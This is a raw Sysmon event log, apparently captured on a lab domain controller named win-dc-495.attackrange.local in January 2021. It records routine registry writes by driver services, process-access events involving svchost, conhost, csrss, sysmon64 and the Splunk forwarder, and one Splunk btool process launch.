13241300x8000000000000000689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:33:54.377{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosDataBinary Data 13241300x8000000000000000688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.377{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x8000000000000000687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.283{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Parameters\WppRecorder_TraceGuid{09281f1f-f66e-485a-99a2-91638f782c49} 13241300x8000000000000000686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.283{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\i8042prt\Parameters\WppRecorder_TraceGuid{7ffb8eb8-2c86-45d6-a7c5-c023d9c070c1} 13241300x8000000000000000685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.221{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\BiosDataBinary Data 13241300x8000000000000000684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.221{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\RegistersDataBinary Data 13241300x8000000000000000683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.221{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\mssmbios\Data\AcpiDataBinary Data 13241300x8000000000000000682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.205{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\Psched\DriverMinorVersionDWORD (0x00000000) 
13241300x8000000000000000681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.205{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\Psched\DriverMajorVersionDWORD (0x00000001) 13241300x8000000000000000680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.205{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\Psched\NdisMinorVersionDWORD (0x0000001e) 13241300x8000000000000000679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.205{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\Psched\NdisMajorVersionDWORD (0x00000006) 13241300x8000000000000000678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.190{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\DriverMinorVersionDWORD (0x00000000) 13241300x8000000000000000677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.190{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\DriverMajorVersionDWORD (0x00000000) 13241300x8000000000000000676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.190{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\NdisMinorVersionDWORD (0x00000028) 13241300x8000000000000000675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:54.190{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\RDMANDK\NdisMajorVersionDWORD (0x00000006) 13241300x8000000000000000674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:33:54.065{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\cdrom\Parameters\WppRecorder_TraceGuid{a4196372-c3c4-42d5-87bf-7edb2e9bcc27} 13241300x8000000000000000673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:53.924{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\volsnap\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:53.924{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\volsnap\Enum\CountDWORD (0x00000001) 13241300x8000000000000000671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:53.924{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\volsnap\Enum\0STORAGE\Volume\{492932f2-d455-11e9-aa46-806e6f6e6963}#0000000000100000 13241300x8000000000000000670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:53.924{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\volume\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:53.924{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\volume\Enum\CountDWORD (0x00000001) 13241300x8000000000000000668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:33:53.924{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\volume\Enum\0STORAGE\Volume\{492932f2-d455-11e9-aa46-806e6f6e6963}#0000000000100000 434400x8000000000000000667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local2021-01-18 13:34:15.223Started13.014.50 10341000x80000000000000001839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.783{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E58-6005-4600-00000000A301}3932C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-4600-00000000A301}3932C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E58-6005-4500-00000000A301}39123916C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8E58-6005-4600-00000000A301}3932C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.789{59A5CD1D-8E58-6005-4600-00000000A301}3932C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8E58-6005-4500-00000000A301}3912C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 10341000x80000000000000001826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.783{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E58-6005-4500-00000000A301}3912C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 